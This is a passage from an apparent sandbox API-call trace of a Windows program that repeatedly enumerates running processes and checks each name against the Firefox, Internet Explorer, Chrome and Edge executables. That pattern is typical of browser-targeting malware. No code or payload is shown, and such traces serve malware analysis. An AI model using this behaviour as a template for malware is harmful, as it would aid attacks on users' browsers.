(lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0261.019] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.019] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0261.020] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0261.020] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0261.020] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0261.020] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.020] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0261.020] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0261.021] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0261.021] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0261.021] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.021] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0261.021] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0261.021] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0261.021] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0261.021] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.021] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0261.022] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0261.022] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0261.022] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0261.022] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.022] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0261.022] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0261.022] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0261.022] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0261.022] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.022] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0261.023] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0261.023] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0261.023] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0261.023] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.023] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0261.023] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0261.023] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0261.023] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0261.023] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.023] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0261.024] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0261.024] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0261.024] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0261.024] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.024] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0261.025] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0261.025] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0261.025] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0261.025] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.025] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0261.025] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0261.025] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0261.025] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0261.025] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.025] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0261.026] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0261.026] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0261.026] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0261.026] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.026] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0261.026] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0261.026] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0261.026] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0261.026] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.026] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0261.027] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0261.027] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0261.027] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0261.027] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.027] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0261.027] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0261.027] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0261.027] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0261.027] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.028] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0261.028] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0261.028] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0261.028] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0261.028] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.028] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0261.029] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0261.029] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0261.029] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0261.029] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.029] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0261.029] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0261.029] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0261.029] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0261.029] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.029] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0261.030] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0261.030] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0261.030] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0261.030] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.030] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0261.030] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0261.030] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0261.030] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0261.030] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.030] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0261.031] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0261.031] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0261.031] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0261.031] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.031] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.031] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0261.031] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0261.032] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0261.032] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.032] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.032] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.032] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.032] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.032] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.032] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0261.033] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0261.033] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0261.033] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0261.033] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.033] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.033] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.033] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.033] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.033] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.033] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0261.034] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0261.034] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0261.034] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0261.034] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.034] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.034] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0261.034] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0261.034] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0261.034] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.034] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0261.035] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0261.035] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0261.035] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0261.035] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.035] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.036] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0261.036] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0261.036] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0261.036] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.036] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.036] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0261.036] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0261.036] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0261.036] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.036] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.037] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0261.037] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0261.037] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0261.037] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.037] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.037] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0261.037] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0261.037] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0261.037] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.037] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0261.038] CloseHandle (hObject=0xd4) returned 1 [0261.038] Sleep (dwMilliseconds=0x3e8) [0262.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0262.044] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.044] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0262.044] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0262.044] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0262.044] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0262.044] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0262.045] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0262.045] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0262.045] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0262.045] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0262.045] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0262.045] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0262.046] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0262.046] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0262.046] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.046] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.046] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0262.046] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0262.046] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0262.046] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.046] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0262.047] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0262.047] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0262.047] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0262.047] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.047] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.047] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0262.047] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0262.047] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0262.047] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.047] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0262.048] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0262.048] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0262.048] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0262.048] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.048] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0262.048] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0262.048] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0262.048] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0262.048] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.048] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0262.049] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0262.049] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 